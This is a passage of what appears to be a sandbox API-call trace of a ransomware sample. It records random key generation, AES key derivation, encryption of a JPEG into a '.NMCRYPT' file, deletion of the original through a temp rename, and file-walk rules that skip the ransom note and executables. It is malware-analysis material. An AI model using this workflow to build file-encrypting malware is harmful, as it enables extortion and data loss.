| out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.852] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.853] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.853] CryptCreateHash (in: hProv=0x8e36e8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44498c | out: phHash=0x1d44498c) returned 1 [0163.853] CryptHashData (hHash=0x9ad4b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.853] CryptDeriveKey (in: hProv=0x8e36e8, Algid=0x6610, hBaseData=0x9ad4b8, dwFlags=0x4, phKey=0x1d444990 | out: phKey=0x1d444990*=0x9ad4f8) returned 1 [0163.853] CryptSetKeyParam (hKey=0x9ad4f8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0163.853] CryptSetKeyParam (hKey=0x9ad4f8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0163.853] wcslen (_String="\\\\?\\") returned 0x4 [0163.853] CryptDuplicateKey (in: hKey=0x9ad4f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad278) returned 1 [0163.853] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0163.854] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0163.854] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=4222) returned 1 [0163.854] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0163.854] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.856] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.856] GetLastError () returned 0x0 [0163.856] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.857] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.857] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.857] GetLastError () returned 0x0 [0163.857] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.857] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.857] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.857] GetLastError () returned 0x0 [0163.857] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.857] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.858] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.858] GetLastError () returned 0x0 [0163.858] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.858] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.858] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.858] GetLastError () returned 0x0 [0163.858] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.858] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.858] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.858] GetLastError () returned 0x0 [0163.858] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.858] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.858] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.858] GetLastError () returned 0x0 [0163.858] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.858] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.858] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.858] GetLastError () returned 0x0 [0163.858] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.858] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.858] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.858] GetLastError () returned 0x0 [0163.858] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.858] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.858] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.858] GetLastError () returned 0x0 [0163.858] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.859] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.859] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.859] GetLastError () returned 0x0 [0163.859] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.859] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.859] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.859] GetLastError () returned 0x0 [0163.859] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.859] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.859] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.859] GetLastError () returned 0x0 [0163.859] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.859] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.859] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.859] GetLastError () returned 0x0 [0163.859] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.859] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.859] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.859] GetLastError () returned 0x0 [0163.859] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.859] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.859] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.859] GetLastError () returned 0x0 [0163.859] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.860] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x7e, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x7e, lpOverlapped=0x0) returned 1 [0163.860] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x7e, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x80) returned 1 [0163.860] GetLastError () returned 0x0 [0163.860] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x80, lpOverlapped=0x0) returned 1 [0163.860] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0163.860] WriteFile (in: hFile=0x588, lpBuffer=0x2974d38*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0163.860] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg")) returned 0x20 [0163.860] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg", dwFileAttributes=0x20) returned 0 [0163.860] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 1 [0163.860] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg")) returned 0 [0163.861] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" [0163.861] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0163.861] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF37C.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf37c.tmp")) returned 0xf37c [0163.861] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF37C.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf37c.tmp"), dwFlags=0x1) returned 0 [0163.862] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF37C.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf37c.tmp")) returned 1 [0163.862] CryptDestroyKey (hKey=0x9ad278) returned 1 [0163.862] wcslen (_String="OK") returned 0x2 [0163.862] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.862] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.862] CryptDestroyKey (hKey=0x9ad4f8) returned 1 [0163.862] CryptDestroyHash (hHash=0x9ad4b8) returned 1 [0163.862] CryptReleaseContext (hProv=0x8e36e8, dwFlags=0x0) returned 1 [0163.862] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0163.862] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*NMCRYPT") returned 0 [0163.862] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*Recovers your files.html") returned 0 [0163.862] PathMatchSpecW (pszFile="Memo.emf", pszSpec="*.exe") returned 0 [0163.862] PathMatchSpecW 